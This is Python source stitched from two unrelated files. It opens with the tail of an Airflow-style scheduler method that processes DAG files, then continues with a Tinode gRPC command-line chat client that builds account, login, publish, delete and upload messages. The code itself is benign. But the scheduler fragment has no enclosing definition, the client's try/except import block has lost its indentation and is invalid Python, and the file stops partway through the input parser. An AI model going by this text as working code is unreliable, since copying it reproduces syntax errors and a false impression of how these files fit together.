        Stats.incr('dag_file_refresh_error', 1, 1)
        # BUGFIX: the second element is an import-error *count* (int) on every
        # other return path; this used to return a list ([]) here.
        return [], 0

    if len(dagbag.dags) > 0:
        self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
    else:
        self.log.warning("No viable dags retrieved from %s", file_path)
        self.update_import_errors(session, dagbag)
        return [], len(dagbag.import_errors)

    # Save individual DAGs in the ORM and update DagModel.last_scheduled_time
    for dag in dagbag.dags.values():
        dag.sync_to_db()

    paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}

    # Pickle the DAGs (if necessary) and put them into a SimpleDag
    for dag_id in dagbag.dags:
        # Only return DAGs that are not paused
        if dag_id not in paused_dag_ids:
            dag = dagbag.get_dag(dag_id)
            pickle_id = None
            if pickle_dags:
                pickle_id = dag.pickle(session).id
            simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))

    dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)

    # Not using multiprocessing.Queue() since it's no longer a separate
    # process and due to some unusual behavior. (empty() incorrectly
    # returns true as described in https://bugs.python.org/issue23582 )
    ti_keys_to_schedule = []
    self._process_dags(dagbag, dags, ti_keys_to_schedule)

    for ti_key in ti_keys_to_schedule:
        dag = dagbag.dags[ti_key[0]]
        task = dag.get_task(ti_key[1])
        ti = models.TaskInstance(task, ti_key[2])
        # Lock the row so a concurrent scheduler can't double-schedule it.
        ti.refresh_from_db(session=session, lock_for_update=True)

        # We check only deps needed to set TI to SCHEDULED state here.
        # Deps needed to set TI to QUEUED state will be batch checked later
        # by the scheduler for better performance.
        dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)

        # Only schedule tasks that have their dependencies met, e.g. to avoid
        # a task that recently got its state changed to RUNNING from somewhere
        # other than the scheduler from getting its state overwritten.
        if ti.are_dependencies_met(
                dep_context=dep_context,
                session=session,
                verbose=True):
            # Task starts out in the scheduled state. All tasks in the
            # scheduled state will be sent to the executor
            ti.state = State.SCHEDULED

        # Also save this task instance to the DB.
        self.log.info("Creating / updating %s in ORM", ti)
        session.merge(ti)

    # commit batch
    session.commit()

    # Record import errors into the ORM
    try:
        self.update_import_errors(session, dagbag)
    except Exception:
        self.log.exception("Error logging import errors!")

    try:
        dagbag.kill_zombies(zombies)
    except Exception:
        self.log.exception("Error killing zombies!")

    return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
    # Emit a liveness metric on every scheduler heartbeat
    # (Stats.incr args: delta=1, sample rate=1).
    Stats.incr('scheduler_heartbeat', 1, 1)
|
tn-cli.py | #!/usr/bin/env python
# coding=utf-8
"""Python implementation of Tinode command line client using gRPC."""
# To make print() compatible between p2 and p3
from __future__ import print_function
import argparse
import base64
import grpc
import json
from PIL import Image
try:
from io import BytesIO as memory_io
except ImportError:
from cStringIO import StringIO as memory_io
import mimetypes
import os
import pkg_resources
import platform
from prompt_toolkit import PromptSession
import random
import re
import requests
import shlex
import sys
import threading
import time
# Import generated grpc modules
from tinode_grpc import pb
from tinode_grpc import pbx
import tn_globals
from tn_globals import printerr
from tn_globals import printout
from tn_globals import stdoutln
from tn_globals import to_json
APP_NAME = "tn-cli"
APP_VERSION = "1.5.8"
PROTOCOL_VERSION = "0"
LIB_VERSION = pkg_resources.get_distribution("tinode_grpc").version
GRPC_VERSION = pkg_resources.get_distribution("grpcio").version
# Maximum in-band (included directly into the message) attachment size which fits into
# a message of 256K in size, assuming base64 encoding and 1024 bytes of overhead.
# This is size of an object *before* base64 encoding is applied.
MAX_INBAND_ATTACHMENT_SIZE = 195840
# Absolute maximum attachment size to be used with the server = 8MB.
MAX_EXTERN_ATTACHMENT_SIZE = 1 << 23
# Maximum allowed linear dimension of an inline image in pixels.
MAX_IMAGE_DIM = 768
# 5 seconds timeout for .await/.must commands.
AWAIT_TIMEOUT = 5
# This is needed for gRPC SSL to work correctly.
os.environ["GRPC_SSL_CIPHER_SUITES"] = "HIGH+ECDSA"
# Setup crash handler: close input reader otherwise a crash
# makes terminal session unusable.
def exception_hook(exc_type, value, trace_back):
    """Global excepthook: join the input reader thread so the terminal is usable.

    The parameters mirror sys.excepthook(type, value, traceback) and are unused
    beyond the required signature. They are renamed so the builtin `type` isn't
    shadowed; the interpreter invokes the hook positionally, so this is safe.
    """
    if tn_globals.InputThread is not None:
        # Give the reader thread a brief chance to shut down cleanly.
        tn_globals.InputThread.join(0.3)

sys.excepthook = exception_hook
# Enable the following variables for debugging.
# os.environ["GRPC_TRACE"] = "all"
# os.environ["GRPC_VERBOSITY"] = "INFO"
# Regex to match and parse subscripted entries in variable paths.
RE_INDEX = re.compile(r"(\w+)\[(\w+)\]")
# Macros module (may be None).
macros = None
# Lightweight helper: a dict whose keys can also be read/written as attributes.
class dotdict(dict):
    """dot.notation access to dictionary attributes.

    Note: __getattr__ maps to dict.get, so reading a missing key yields None
    instead of raising AttributeError/KeyError.
    """
    __getattr__ = dict.get
    __setattr__ = dict.__setitem__
    __delattr__ = dict.__delitem__
# Pack user's name and avatar into a theCard.
def makeTheCard(fn, photofile):
    """Build a theCard dict from a user name and/or avatar file.

    :param fn: user-visible name; surrounding whitespace is stripped.
    :param photofile: path to the avatar image; '' requests avatar deletion,
        None means "no photo change".
    :returns: the card dict, or None when there is nothing to pack.
    """
    card = None
    if (fn is not None and fn.strip() != "") or photofile is not None:
        card = {}
        if fn is not None:
            card['fn'] = fn.strip()

        if photofile is not None:
            if photofile == '':
                # Delete the avatar.
                card['photo'] = {
                    'data': '␡'
                }
            else:
                try:
                    # BUGFIX: `with` guarantees the file is closed even when
                    # reading/encoding fails (the handle used to leak).
                    with open(photofile, 'rb') as f:
                        raw = f.read()
                    # File extension is used as a file type.
                    mimetype = mimetypes.guess_type(photofile)
                    if mimetype[0]:
                        mimetype = mimetype[0].split("/")[1]
                    else:
                        mimetype = 'jpeg'
                    data = base64.b64encode(raw)
                    # python3 fix: b64encode returns bytes, not str.
                    if type(data) is not str:
                        data = data.decode()
                    card['photo'] = {
                        'data': data,
                        'type': mimetype
                    }
                except IOError as err:
                    stdoutln("Error opening '" + photofile + "':", err)

    return card
# Create drafty representation of a message with an inline image.
def inline_image(filename):
    """Load an image, downscale it to MAX_IMAGE_DIM if needed, and wrap it
    into a drafty document with a single inline-image ('IM') entity.

    :param filename: path of the image file to inline.
    :returns: drafty dict, or None if the image could not be processed.
    """
    try:
        im = Image.open(filename, 'r')
        try:
            width = im.width
            height = im.height
            # Keep the source format when known; default to JPEG.
            # (Renamed from `format` to avoid shadowing the builtin.)
            img_format = im.format if im.format else "JPEG"
            if width > MAX_IMAGE_DIM or height > MAX_IMAGE_DIM:
                # Scale the image down preserving the aspect ratio.
                scale = min(min(width, MAX_IMAGE_DIM) / width,
                            min(height, MAX_IMAGE_DIM) / height)
                width = int(width * scale)
                height = int(height * scale)
                resized = im.resize((width, height))
                im.close()
                im = resized

            mimetype = 'image/' + img_format.lower()
            bitbuffer = memory_io()
            im.save(bitbuffer, format=img_format)
            data = base64.b64encode(bitbuffer.getvalue())
            # python3 fix: b64encode returns bytes, not str.
            if type(data) is not str:
                data = data.decode()

            return {
                'txt': ' ',
                'fmt': [{'len': 1}],
                'ent': [{'tp': 'IM', 'data':
                    {'val': data, 'mime': mimetype, 'width': width, 'height': height,
                     'name': os.path.basename(filename)}}]
            }
        finally:
            # BUGFIX: close the image even when save/encode raises
            # (it used to leak on error).
            im.close()
    except IOError as err:
        stdoutln("Failed processing image '" + filename + "':", err)
    return None
# Create a drafty message with an *in-band* attachment.
def attachment(filename):
    """Read a file and wrap it into a drafty document as an in-band ('EX') attachment.

    :param filename: path of the file to attach.
    :returns: drafty dict, or None if the file could not be read.
    """
    try:
        # `with` guarantees the file is closed even if encoding fails.
        with open(filename, 'rb') as f:
            raw = f.read()
        # Try to guess the mime type. BUGFIX: guess_type() returns a
        # (type, encoding) tuple; the 'mime' field needs just the type string
        # (as done in makeTheCard above).
        mimetype = mimetypes.guess_type(filename)[0]
        data = base64.b64encode(raw)
        # python3 fix: b64encode returns bytes, not str.
        if type(data) is not str:
            data = data.decode()
        return {
            'fmt': [{'at': -1}],
            'ent': [{'tp': 'EX', 'data': {
                'val': data, 'mime': mimetype, 'name': os.path.basename(filename)
            }}]
        }
    except IOError as err:
        stdoutln("Error processing attachment '" + filename + "':", err)
        return None
# encode_to_bytes takes an object/dictionary and converts it to json-formatted byte array.
def encode_to_bytes(src):
    """Serialize *src* to UTF-8 encoded JSON bytes; None passes through as None."""
    # `is None` instead of `== None`: identity check is the correct idiom.
    if src is None:
        return None
    return json.dumps(src).encode('utf-8')
# Parse credentials
def parse_cred(cred):
    """Convert a 'method:value:response,...' string into a list of pb.ClientCred.

    Missing trailing fields default to None; None input yields None.
    """
    if cred is None:
        return None

    result = []
    for chunk in cred.split(","):
        fields = chunk.split(":")
        # Pad to three fields so absent value/response become None.
        method, value, response = (fields + [None, None, None])[:3]
        result.append(pb.ClientCred(method=method, value=value, response=response))
    return result
# Read a value in the server response using dot notation, i.e.
# $user.params.token or $meta.sub[1].user
def getVar(path):
    """Resolve a dotted '$variable' reference; non-$ strings are returned as-is.

    Supports attribute access and subscripting, e.g. $meta.sub[1].user.
    Returns None when the root variable is unknown; bytes are decoded to str.
    """
    if not path.startswith("$"):
        return path

    segments = path.split('.')
    root = segments[0]
    if root not in tn_globals.Variables:
        return None

    value = tn_globals.Variables[root]
    for segment in segments[1:]:
        index = None
        subscript = RE_INDEX.match(segment)
        if subscript:
            segment = subscript.group(1)
            raw = subscript.group(2)
            # Numeric subscripts index sequences; others are used verbatim.
            index = int(raw) if raw.isdigit() else raw
        value = getattr(value, segment)
        if index is not None:
            value = value[index]
    if isinstance(value, bytes):
        value = value.decode('utf-8')
    return value
# Dereference values, i.e. cmd.val == $usr => cmd.val == <actual value of usr>
def derefVals(cmd):
    """Replace every '$var' string attribute of *cmd* with its resolved value.

    The 'varname' attribute and dunder attributes are left untouched.
    Returns the (mutated) *cmd* object.
    """
    for attr in dir(cmd):
        if attr.startswith("__") or attr == 'varname':
            continue
        current = getattr(cmd, attr)
        # Exact `type(...) is str` check kept on purpose (no str subclasses).
        if type(current) is str and current.startswith("$"):
            setattr(cmd, attr, getVar(current))
    return cmd
# Prints prompt and reads lines from stdin.
def readLinesFromStdin():
    """Yield input lines: from the interactive prompt, or raw from sys.stdin."""
    if not tn_globals.IsInteractive:
        # iter(...) is a workaround for a python2 bug https://bugs.python.org/issue3907
        for line in iter(sys.stdin.readline, ''):
            yield line
        return

    while True:
        try:
            yield tn_globals.Prompt.prompt()
        except EOFError:
            # Ctrl+D ends the interactive session.
            return
# Stdin reads a possibly multiline input from stdin and queues it for asynchronous processing.
def stdin(InputQueue):
    """Read lines, join backslash-continued lines into one command, queue them.

    Returns when one of the exit commands is queued; on a read error an
    'exit' command is queued so the consumer shuts down.
    """
    pending = ""
    try:
        for line in readLinesFromStdin():
            line = line.strip()

            # A trailing backslash means the command continues on the next line.
            if line.endswith("\\"):
                line = line[:-1].rstrip()
                if line:
                    pending = (pending + " " + line) if pending else line
                if tn_globals.IsInteractive:
                    sys.stdout.write("... ")
                    sys.stdout.flush()
                continue

            # Flush a previously accumulated multiline command.
            if pending:
                if line:
                    pending += " " + line
                InputQueue.append(pending)
                pending = ""
                continue

            InputQueue.append(line)

            # Stop processing input on any of the exit commands.
            if line in ('exit', 'quit', '.exit', '.quit'):
                return
    except Exception as ex:
        printerr("Exception in stdin", ex)
        InputQueue.append('exit')
# Constructing individual messages
# {hi}
def hiMsg(id, background):
    """Build a {hi} handshake message and register a response handler for it."""
    # Print the server parameters once the server replies to this message id.
    tn_globals.OnCompletion[str(id)] = lambda params: print_server_params(params)
    user_agent = (APP_NAME + "/" + APP_VERSION + " (" +
                  platform.system() + "/" + platform.release() + "); gRPC-python/" +
                  LIB_VERSION + "+" + GRPC_VERSION)
    return pb.ClientMsg(hi=pb.ClientHi(id=str(id), user_agent=user_agent,
                                       ver=LIB_VERSION, lang="EN", background=background))
# {acc}
def accMsg(id, cmd, ignored):
    """Build an {acc} message that creates or alters an account."""
    # A user name implies the basic scheme with a "uname:password" secret.
    if cmd.uname:
        cmd.scheme = 'basic'
        if cmd.password is None:
            cmd.password = ''
        cmd.secret = str(cmd.uname) + ":" + str(cmd.password)

    if cmd.secret:
        if cmd.scheme is None:
            cmd.scheme = 'basic'
        cmd.secret = cmd.secret.encode('utf-8')
    else:
        cmd.secret = b''

    # Map --suspend true/false onto the account state; anything else → no change.
    state = None
    if cmd.suspend == 'true':
        state = 'susp'
    elif cmd.suspend == 'false':
        state = 'ok'

    cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
    cmd.private = encode_to_bytes(cmd.private)
    return pb.ClientMsg(acc=pb.ClientAcc(id=str(id), user_id=cmd.user, state=state,
        scheme=cmd.scheme, secret=cmd.secret, login=cmd.do_login,
        tags=cmd.tags.split(",") if cmd.tags else None,
        desc=pb.SetDesc(default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon),
                        public=cmd.public, private=cmd.private),
        cred=parse_cred(cmd.cred)), on_behalf_of=tn_globals.DefaultUser)
# {login}
def loginMsg(id, cmd, args):
    """Build a {login} message and pick a cookie- or stdout-handler for the reply."""
    if cmd.secret is None:
        # No explicit secret: assemble "uname:password" from the parts given.
        if cmd.uname is None:
            cmd.uname = ''
        if cmd.password is None:
            cmd.password = ''
        cmd.secret = (str(cmd.uname) + ":" + str(cmd.password)).encode('utf-8')
    elif cmd.scheme == "basic":
        # Assuming secret is a uname:password string.
        cmd.secret = str(cmd.secret).encode('utf-8')
    else:
        # All other schemes: assume secret is a base64-encoded string
        cmd.secret = base64.b64decode(cmd.secret)

    msg = pb.ClientMsg(login=pb.ClientLogin(id=str(id), scheme=cmd.scheme,
                                            secret=cmd.secret, cred=parse_cred(cmd.cred)))

    # Interactive sessions save the auth token as a cookie unless told not to.
    use_cookie = tn_globals.IsInteractive and not args.no_cookie
    if use_cookie:
        tn_globals.OnCompletion[str(id)] = lambda params: save_cookie(params)
    else:
        tn_globals.OnCompletion[str(id)] = lambda params: handle_login(params)
    return msg
# {sub}
def subMsg(id, cmd, ignored):
    # Build a {sub} message: subscribe to (and optionally initialize) a topic.
    if not cmd.topic:
        cmd.topic = tn_globals.DefaultTopic
    if cmd.get_query:
        # Comma-separated list → space-separated 'what' string, e.g. "desc sub".
        cmd.get_query = pb.GetQuery(what=" ".join(cmd.get_query.split(",")))
    # Public card is assembled from --fn/--photo; both blobs are JSON-encoded bytes.
    cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
    cmd.private = encode_to_bytes(cmd.private)
    return pb.ClientMsg(sub=pb.ClientSub(id=str(id), topic=cmd.topic,
        set_query=pb.SetQuery(
            desc=pb.SetDesc(public=cmd.public, private=cmd.private,
                default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon)),
            sub=pb.SetSub(mode=cmd.mode),
            tags=cmd.tags.split(",") if cmd.tags else None),
        get_query=cmd.get_query), on_behalf_of=tn_globals.DefaultUser)
# {leave}
def leaveMsg(id, cmd, ignored):
    """Build a {leave} message: detach from (and optionally unsubscribe) a topic."""
    # Fall back to the session's default topic when none was given.
    cmd.topic = cmd.topic or tn_globals.DefaultTopic
    return pb.ClientMsg(leave=pb.ClientLeave(id=str(id), topic=cmd.topic,
                        unsub=cmd.unsub), on_behalf_of=tn_globals.DefaultUser)
# {pub}
def pubMsg(id, cmd, ignored):
    # Build a {pub} message publishing plain, drafty, image or attachment content.
    if not cmd.topic:
        cmd.topic = tn_globals.DefaultTopic

    head = {}
    if cmd.drafty or cmd.image or cmd.attachment:
        # Anything other than plain text is sent as drafty.
        head['mime'] = encode_to_bytes('text/x-drafty')
    # Explicitly provided 'mime' will override the one assigned above.
    if cmd.head:
        for h in cmd.head.split(","):
            key, val = h.split(":")
            head[key] = encode_to_bytes(val)

    # Priority: --drafty, then --image, then --attachment, then plain --content.
    content = json.loads(cmd.drafty) if cmd.drafty \
        else inline_image(cmd.image) if cmd.image \
        else attachment(cmd.attachment) if cmd.attachment \
        else cmd.content
    if not content:
        return None

    return pb.ClientMsg(pub=pb.ClientPub(id=str(id), topic=cmd.topic, no_echo=True,
        head=head, content=encode_to_bytes(content)), on_behalf_of=tn_globals.DefaultUser)
# {get}
def getMsg(id, cmd, ignored):
    """Build a {get} query for topic description, subs, tags, messages and/or creds."""
    if not cmd.topic:
        cmd.topic = tn_globals.DefaultTopic

    # Assemble the 'what' string in the order the server expects.
    selectors = ((cmd.desc, "desc"), (cmd.sub, "sub"), (cmd.tags, "tags"),
                 (cmd.data, "data"), (cmd.cred, "cred"))
    what = [name for enabled, name in selectors if enabled]
    return pb.ClientMsg(get=pb.ClientGet(id=str(id), topic=cmd.topic,
        query=pb.GetQuery(what=" ".join(what))), on_behalf_of=tn_globals.DefaultUser)
# {set}
def setMsg(id, cmd, ignored):
    # Build a {set} message updating topic description, subscription mode,
    # tags and/or a credential.
    if not cmd.topic:
        cmd.topic = tn_globals.DefaultTopic

    if cmd.public == None:
        # No raw public blob given: assemble a card from --fn/--photo.
        cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
    else:
        cmd.public = encode_to_bytes(cmd.public)
    cmd.private = encode_to_bytes(cmd.private)
    cred = parse_cred(cmd.cred)
    if cred:
        if len(cred) > 1:
            stdoutln('Warning: multiple credentials specified. Will use only the first one.')
        # {set} carries a single credential only.
        cred = cred[0]

    return pb.ClientMsg(set=pb.ClientSet(id=str(id), topic=cmd.topic,
        query=pb.SetQuery(
            desc=pb.SetDesc(default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon),
                public=cmd.public, private=cmd.private),
            sub=pb.SetSub(user_id=cmd.user, mode=cmd.mode),
            tags=cmd.tags.split(",") if cmd.tags else None,
            cred=cred)), on_behalf_of=tn_globals.DefaultUser)
# {del}
def delMsg(id, cmd, ignored):
    # Build a {del} message: delete messages, a subscription, a topic, a user
    # or a credential depending on cmd.what. Returns None on invalid input.
    if not cmd.what:
        stdoutln("Must specify what to delete")
        return None

    enum_what = None
    # NOTE(review): `before` is assigned but never used below.
    before = None
    seq_list = None  # message-ID ranges, only for what == 'msg'
    cred = None      # single credential, only for what == 'cred'
    if cmd.what == 'msg':
        enum_what = pb.ClientDel.MSG
        cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
        if not cmd.topic:
            stdoutln("Must specify topic to delete messages")
            return None

        if cmd.user:
            stdoutln("Unexpected '--user' parameter")
            return None
        if not cmd.seq:
            stdoutln("Must specify message IDs to delete")
            return None

        if cmd.seq == 'all':
            # NOTE(review): 0x8FFFFFF is presumably an "all messages" upper
            # bound sentinel — confirm against the server's expected seq range.
            seq_list = [pb.SeqRange(low=1, hi=0x8FFFFFF)]
        else:
            # Split a list like '1,2,3,10-22' into ranges.
            try:
                seq_list = []
                for item in cmd.seq.split(','):
                    if '-' in item:
                        low, hi = [int(x.strip()) for x in item.split('-')]
                        if low>=hi or low<=0:
                            stdoutln("Invalid message ID range {0}-{1}".format(low, hi))
                            return None
                        seq_list.append(pb.SeqRange(low=low, hi=hi))
                    else:
                        seq_list.append(pb.SeqRange(low=int(item.strip())))
            except ValueError as err:
                stdoutln("Invalid message IDs: {0}".format(err))
                return None

    elif cmd.what == 'sub':
        # Deleting a subscription needs both a topic and a user.
        cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
        cmd.user = cmd.user if cmd.user else tn_globals.DefaultUser
        if not cmd.user or not cmd.topic:
            stdoutln("Must specify topic and user to delete subscription")
            return None
        enum_what = pb.ClientDel.SUB

    elif cmd.what == 'topic':
        cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
        if cmd.user:
            stdoutln("Unexpected '--user' parameter")
            return None
        if not cmd.topic:
            stdoutln("Must specify topic to delete")
            return None
        enum_what = pb.ClientDel.TOPIC

    elif cmd.what == 'user':
        cmd.user = cmd.user if cmd.user else tn_globals.DefaultUser
        if cmd.topic:
            stdoutln("Unexpected '--topic' parameter")
            return None
        enum_what = pb.ClientDel.USER

    elif cmd.what == 'cred':
        if cmd.user:
            stdoutln("Unexpected '--user' parameter")
            return None
        if cmd.topic != 'me':
            stdoutln("Topic must be 'me'")
            return None
        cred = parse_cred(cmd.cred)
        if cred is None:
            stdoutln("Failed to parse credential '{0}'".format(cmd.cred))
            return None
        # Only a single credential can be deleted at a time.
        cred = cred[0]
        enum_what = pb.ClientDel.CRED

    else:
        stdoutln("Unrecognized delete option '", cmd.what, "'")
        return None

    msg = pb.ClientMsg(on_behalf_of=tn_globals.DefaultUser)
    # Field named 'del' conflicts with the keyword 'del. This is a work around.
    xdel = getattr(msg, 'del')
    """
    setattr(msg, 'del', pb.ClientDel(id=str(id), topic=topic, what=enum_what, hard=hard,
    del_seq=seq_list, user_id=user))
    """
    # Populate the protobuf in place; set only the optional fields that were given.
    xdel.id = str(id)
    xdel.what = enum_what
    if cmd.hard != None:
        xdel.hard = cmd.hard
    if seq_list != None:
        xdel.del_seq.extend(seq_list)
    if cmd.user != None:
        xdel.user_id = cmd.user
    if cmd.topic != None:
        xdel.topic = cmd.topic
    if cred != None:
        xdel.cred.MergeFrom(cred)

    return msg
# {note}
def noteMsg(id, cmd, ignored):
    """Build a {note} notification: kp (key press), read or recv receipt.

    For read/recv the reported message ID (--seq) is converted to int;
    kp carries no message ID.
    """
    if not cmd.topic:
        cmd.topic = tn_globals.DefaultTopic

    enum_what = None
    if cmd.what == 'kp':
        enum_what = pb.KP
        cmd.seq = None
    elif cmd.what == 'read':
        enum_what = pb.READ
        cmd.seq = int(cmd.seq)
    elif cmd.what == 'recv':
        # BUGFIX: this branch compared the undefined name `what` (NameError
        # at runtime) instead of cmd.what, so 'recv' notes never worked.
        enum_what = pb.RECV
        cmd.seq = int(cmd.seq)
    return pb.ClientMsg(note=pb.ClientNote(topic=cmd.topic, what=enum_what,
                        seq_id=cmd.seq), on_behalf_of=tn_globals.DefaultUser)
# Upload file out of band over HTTP(S) (not gRPC).
def upload(id, cmd, args):
    # POST the file to the server's /file/u/ endpoint using the current auth
    # token, then feed the returned {ctrl} object into the normal handler.
    # Always returns None (no gRPC message is produced for uploads).
    try:
        scheme = 'https' if args.ssl else 'http'
        result = requests.post(
            scheme + '://' + args.web_host + '/v' + PROTOCOL_VERSION + '/file/u/',
            headers = {
                'X-Tinode-APIKey': args.api_key,
                'X-Tinode-Auth': 'Token ' + tn_globals.AuthToken,
                'User-Agent': APP_NAME + " " + APP_VERSION + "/" + LIB_VERSION
            },
            data = {'id': id},
            # NOTE(review): the opened file object is handed to requests and
            # never explicitly closed here.
            files = {'file': (cmd.filename, open(cmd.filename, 'rb'))})
        handle_ctrl(dotdict(json.loads(result.text)['ctrl']))
    except Exception as ex:
        stdoutln("Failed to upload '{0}'".format(cmd.filename), ex)
    return None
# Given an array of parts, parse commands and arguments
def parse_cmd(parts):
    """Build an argparse parser for the command named in parts[0].

    Returns None for unknown commands (unless a macros module supplies one);
    the caller performs the actual argument parsing.
    """
    parser = None
    if parts[0] == "acc":
        parser = argparse.ArgumentParser(prog=parts[0], description='Create or alter an account')
        parser.add_argument('--user', default='new', help='ID of the account to update')
        parser.add_argument('--scheme', default=None, help='authentication scheme, default=basic')
        parser.add_argument('--secret', default=None, help='secret for authentication')
        parser.add_argument('--uname', default=None, help='user name for basic authentication')
        parser.add_argument('--password', default=None, help='password for basic authentication')
        parser.add_argument('--do-login', action='store_true', help='login with the newly created account')
        # NOTE(review): `action=None` here looks like it was meant to be
        # `default=None` as in the sibling options; behavior happens to be the
        # same because action=None selects the default 'store' action.
        parser.add_argument('--tags', action=None, help='tags for user discovery, comma separated list without spaces')
        parser.add_argument('--fn', default=None, help='user\'s human name')
        parser.add_argument('--photo', default=None, help='avatar file name')
        parser.add_argument('--private', default=None, help='user\'s private info')
        parser.add_argument('--auth', default=None, help='default access mode for authenticated users')
        parser.add_argument('--anon', default=None, help='default access mode for anonymous users')
        parser.add_argument('--cred', default=None, help='credentials, comma separated list in method:value format, e.g. email:test@example.com,tel:12345')
        parser.add_argument('--suspend', default=None, help='true to suspend the account, false to un-suspend')
    elif parts[0] == "del":
        parser = argparse.ArgumentParser(prog=parts[0], description='Delete message(s), subscription, topic, user')
        parser.add_argument('what', default=None, help='what to delete')
        parser.add_argument('--topic', default=None, help='topic being affected')
        parser.add_argument('--user', default=None, help='either delete this user or a subscription with this user')
        parser.add_argument('--seq', default=None, help='"all" or a list of comma- and dash-separated message IDs to delete, e.g. "1,2,9-12"')
        parser.add_argument('--hard', action='store_true', help='request to hard-delete')
        parser.add_argument('--cred', help='credential to delete in method:value format, e.g. email:test@example.com, tel:12345')
    elif parts[0] == "login":
        parser = argparse.ArgumentParser(prog=parts[0], description='Authenticate current session')
        # Positional 'secret' and --secret share the same dest; either spelling works.
        parser.add_argument('secret', nargs='?', default=argparse.SUPPRESS, help='secret for authentication')
        parser.add_argument('--scheme', default='basic', help='authentication schema, default=basic')
        parser.add_argument('--secret', dest='secret', default=None, help='secret for authentication')
        parser.add_argument('--uname', default=None, help='user name in basic authentication scheme')
        parser.add_argument('--password', default=None, help='password in basic authentication scheme')
        parser.add_argument('--cred', default=None, help='credentials, comma separated list in method:value:response format, e.g. email:test@example.com,tel:12345')
    elif parts[0] == "sub":
        parser = argparse.ArgumentParser(prog=parts[0], description='Subscribe to topic')
        parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to subscribe to')
        parser.add_argument('--topic', dest='topic', default=None, help='topic to subscribe to')
        parser.add_argument('--fn', default=None, help='topic\'s user-visible name')
        parser.add_argument('--photo', default=None, help='avatar file name')
        parser.add_argument('--private', default=None, help='topic\'s private info')
        parser.add_argument('--auth', default=None, help='default access mode for authenticated users')
        parser.add_argument('--anon', default=None, help='default access mode for anonymous users')
        parser.add_argument('--mode', default=None, help='new value of access mode')
        parser.add_argument('--tags', default=None, help='tags for topic discovery, comma separated list without spaces')
        parser.add_argument('--get-query', default=None, help='query for topic metadata or messages, comma separated list without spaces')
    elif parts[0] == "leave":
        parser = argparse.ArgumentParser(prog=parts[0], description='Detach or unsubscribe from topic')
        parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to detach from')
        parser.add_argument('--topic', dest='topic', default=None, help='topic to detach from')
        parser.add_argument('--unsub', action='store_true', help='detach and unsubscribe from topic')
    elif parts[0] == "pub":
        parser = argparse.ArgumentParser(prog=parts[0], description='Send message to topic')
        parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to publish to')
        parser.add_argument('--topic', dest='topic', default=None, help='topic to publish to')
        parser.add_argument('content', nargs='?', default=argparse.SUPPRESS, help='message to send')
        parser.add_argument('--head', help='message headers')
        parser.add_argument('--content', dest='content', help='message to send')
        parser.add_argument('--drafty', help='structured message to send, e.g. drafty content')
        parser.add_argument('--image', help='image file to insert into message (not implemented yet)')
        parser.add_argument('--attachment', help='file to send as an attachment (not implemented yet)')
    elif parts[0] == "get":
        parser = argparse.ArgumentParser(prog=parts[0], description='Query topic for messages or metadata')
        parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to query')
        parser.add_argument('--topic', dest='topic', default=None, help='topic to query')
        parser.add_argument('--desc', action='store_true', help='query topic description')
        parser.add_argument('--sub', action='store_true', help='query topic subscriptions')
        parser.add_argument('--tags', action='store_true', help='query topic tags')
        parser.add_argument('--data', action='store_true', help='query topic messages')
        parser.add_argument('--cred', action='store_true', help='query account credentials')
    elif parts[0] == "set":
        parser = argparse.ArgumentParser(prog=parts[0], description='Update topic metadata')
        parser.add_argument('topic', help='topic to update')
        parser.add_argument('--fn', help='topic\'s title')
        parser.add_argument('--photo', help='avatar file name')
        parser.add_argument('--public', help='topic\'s public info, alternative to fn+photo')
        parser.add_argument('--private', help='topic\'s private info')
        parser.add_argument('--auth', help='default access mode for authenticated users')
        parser.add_argument('--anon', help='default access mode for anonymous users')
        parser.add_argument('--user', help='ID of the account to update')
        parser.add_argument('--mode', help='new value of access mode')
        parser.add_argument('--tags', help='tags for topic discovery, comma separated list without spaces')
        parser.add_argument('--cred', help='credential to add in method:value format, e.g. email:test@example.com, tel:12345')
    elif parts[0] == "note":
        parser = argparse.ArgumentParser(prog=parts[0], description='Send notification to topic, ex "note kp"')
        parser.add_argument('topic', help='topic to notify')
        parser.add_argument('what', nargs='?', default='kp', const='kp', choices=['kp', 'read', 'recv'],
            help='notification type: kp (key press), recv, read - message received or read receipt')
        parser.add_argument('--seq', help='message ID being reported')
    elif parts[0] == "upload":
        parser = argparse.ArgumentParser(prog=parts[0], description='Upload file out of band')
        parser.add_argument('filename', help='name of the file to upload')
    elif macros:
        # Fall back to user-defined macros for commands not built in.
        parser = macros.parse_macro(parts)
    return parser
# Parses command line into command and parameters.
def parse_input(cmd):
    """Parse a raw command line into an argparse.Namespace.

    Recognizes the local dot-commands (.use, .await, .must, .log, .sleep,
    .verbose) here and delegates everything else to parse_cmd(). On success
    returns the parsed namespace with .cmd, .synchronous, .failOnError (and
    .varname when given) attached; returns None for empty/invalid input,
    after printing the list of available commands when the verb is unknown.
    """
    # Split line into parts using shell-like syntax.
    try:
        parts = shlex.split(cmd, comments=True)
    except Exception as err:
        printout('Error parsing command: ', err)
        return None
    if len(parts) == 0:
        return None

    parser = None
    varname = None
    synchronous = False
    failOnError = False
    if parts[0] == ".use":
        parser = argparse.ArgumentParser(prog=parts[0], description='Set default user or topic')
        parser.add_argument('--user', default="unchanged", help='ID of default (on_behalf_of) user')
        parser.add_argument('--topic', default="unchanged", help='Name of default topic')

